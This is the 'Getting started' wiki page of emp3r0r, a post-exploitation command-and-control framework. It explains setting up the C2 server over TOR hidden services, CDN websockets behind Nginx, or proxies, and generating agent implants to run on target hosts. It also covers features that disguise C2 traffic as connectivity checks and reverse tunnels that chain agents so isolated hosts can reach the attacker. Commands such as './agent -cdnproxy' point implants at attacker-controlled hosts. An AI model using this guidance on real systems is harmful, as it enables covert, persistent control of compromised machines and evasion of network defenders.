-
-
Notifications
You must be signed in to change notification settings - Fork 259
Getting started
This program includes a terminal UI, allowing you to navigate through emp3r0r's features and control your targets (agents)
Currently, emp3r0r supports:
- Direct agent to CC connection using HTTP2
- Connection through TOR via external TOR proxy
- Connection through CDN using websocket, no external program needed
- Connection through upstream proxy server (HTTP, SOCKS, etc.)
Under ./core, run ./emp3r0r, and follow on-screen instructions.
In "additional CC server addresses" prompt, you can add multiple CC server addresses at once
If you intend to make the server certificate valid for multiple domains/IPs (for example, a TOR domain and a normal domain), you can do that by adding multiple C2 addresses when prompted.
After running ./emp3r0r, the C2 binary will be built if non-existent, and then emp3r0r interface should be brought up, with several tmux panes pre-opened and titled.
Type help to get started.
To use TOR, you have to set up a hidden service first
Note: TOR hidden service doesn't need a public IP address to work, you can just run your service from anywhere
Assuming your hidden service is configured as:
# /etc/tor/torrc
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 443 127.0.0.1:8000
TOR domain name:
❯ sudo cat /var/lib/tor/hidden_service/hostname
cc.onionWhen your hidden service is ready, you can build CC program as mentioned in Build CC
To run your CC server: ./emp3r0r
First you need a CDN that can forward websocket traffic for you. FYI, Cloudflare can do that.
I assume you already knew how to configure a CDN for your website. Here we put our CC server behind Nginx:
HTTP2 websocket in TLS websocket websocket HTTP2
agent -------> socks5 ------------------> CDN -----------> Nginx ----------> CC websocket server -------> CC
Nginx config:
# NOTE In `http://127.0.0.1:9000/ws`, `/ws` is hard coded in emp3r0r C2
location /emp3r0r {
proxy_pass http://127.0.0.1:9000/ws;
proxy_redirect off;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $http_host;
# Show realip
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
When your CDN and Nginx are ready, you can build CC program as mentioned in Build CC
To run CC server with CDN support enabled:
./cc -cdn2proxy 9000 # 9000 is the listening port of websocket serverOne agent build can only be run on one target, otherwise they will conflict
In emp3r0r's console, type gen_agent to build agent binaries, follow on-screen instructions.
Run the generated agent binary (under ./core/build) on target host.
When the target is connected, type upgrade_agent, the target will reconnect with the new version.
This is a URL that works like Windows's NCSI connectivity check, it's designed to hide the actual C2 traffic.
You can configure this URL to some legit site such as https://github.com/jm33-m0/emp3r0r, or some other sites that are considered legit in your target network.
When this option is enabled, agents will request the pre-configured URL, expecting to find a certain text pattern in server's response, when it's found, agents continue to connect to the actual C2 server, if not found, agents will sleep for a pre-configured time span and repeat the process.
You can specify (hardcode) a proxy address into your agent binary when using gen_agent
If you didn't do that, use ./agent -proxy 'socks5://ip:port' instead
Use UDP broadcasting to communicate and form proxy chain to gain Internet access.
Can be disabled if you don't want the agent to send noisy UDP traffic
(you can adjust the time interval via broadcast_interval_min and broadcast_interval_max as well)
This is not a build-time option, but since I have mentioned auto-proxy, I will explain this as well.
This works like ssh -R, one connected agent initiates a connection towards another agent (that cannot send outbound traffic), and use that connection to provide SOCKS5 proxy for target agent so it can reach C2.
Use DNS over HTTPS in agent, to secure our DNS requests, you can opt out if this is not a concern or DoH is unavailable
To run agent with direct connection to CC server, just ./agent, if you want more control:
❯ ./agent -h
Usage of ./agent:
-cdnproxy string
CDN proxy for emp3r0r agent's C2 communication
-daemon
Daemonize
-doh string
DNS over HTTPS server for CDN proxy's DNS requests
-proxy string
Proxy for emp3r0r agent's C2 communication
-silent
Suppress output
I recommend hardcode these variables when using gen_agent.
Likewise, build the agent with onion domain name as CC IP
To run agent, you have to run TOR proxy first, I have a static tor binary for you
On your target, run ./agent, it will automatically use TOR proxy (socks5://127.0.0.1:9050)
Or if you want to use a different TOR proxy, type ./agent -proxy 'socks5://addr:port'
Same build proccess, use your domain name as CC IP
./agent -cdnproxy "wss://example.com/emp3r0r"I recommend hardcode the proxy address when using gen_agent.